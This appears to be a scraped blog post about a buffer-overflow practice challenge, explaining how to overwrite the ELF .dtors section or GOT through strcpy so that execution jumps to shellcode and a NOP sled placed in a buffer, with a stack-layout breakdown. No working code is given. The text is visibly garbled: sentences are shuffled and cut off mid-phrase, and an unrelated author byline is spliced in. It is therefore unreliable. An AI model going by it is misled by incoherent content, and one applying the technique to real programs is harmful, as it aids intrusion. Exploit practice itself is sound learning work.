11/10/2023 0 Comments Overwriting dtors with pcalcJust get the address of this and overwrite this with the address of buf. Keep on following and soon you will find a simple jmp statement. System Hacking & Reverse Engineering documented by h2spice Buffer Overflow - Overwrite EIP Who am I Sanghwan,Ahn (h2spice) Works for LINE. So, basically use x/i in GDB over the instruction in the code. It is quite simple and exploitation is possible even without knowing about GOT and PLT tables. I knew straight ahead that this is the way to go but didn’t know how to exploit it. The second approach as I knew was basically to overwrite the GOT table. His exploit is same as mine which lead me to believe that there is no problem with this exploit. I eventually landed on another blog which solved the same problem by overwriting the. I googled and found people complaining for the same thing. This made me think that there may be some protection against this attack built into gcc. ![]() Upon furthure exploration I found that pbuf was over-written correctly and the segmentation fault actually occurs while copying argv inside strcpy(). ![]() In the second argument I pass the address of buf which will be over-written at the. So, using first strcpy(), I place my shellcode in buf and nop sleds and overwrite pbuf to contain address of. Using objdump and nm, I got the address of the. This section stored in ELF contains a pointer to the destructor for main() function. The first approach was basically to overwrite the. ![]() This is due to the usage of exit() system call, so the main() function never returns. I figures this one out quite quickly but unfortunately due to some changes in gcc, I wasted a lot of time.Ģ56 byte buffer + 4 bytes of character pointer pbuf + 4 bytes of saved EBP + 4 bytes of saved EIP
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |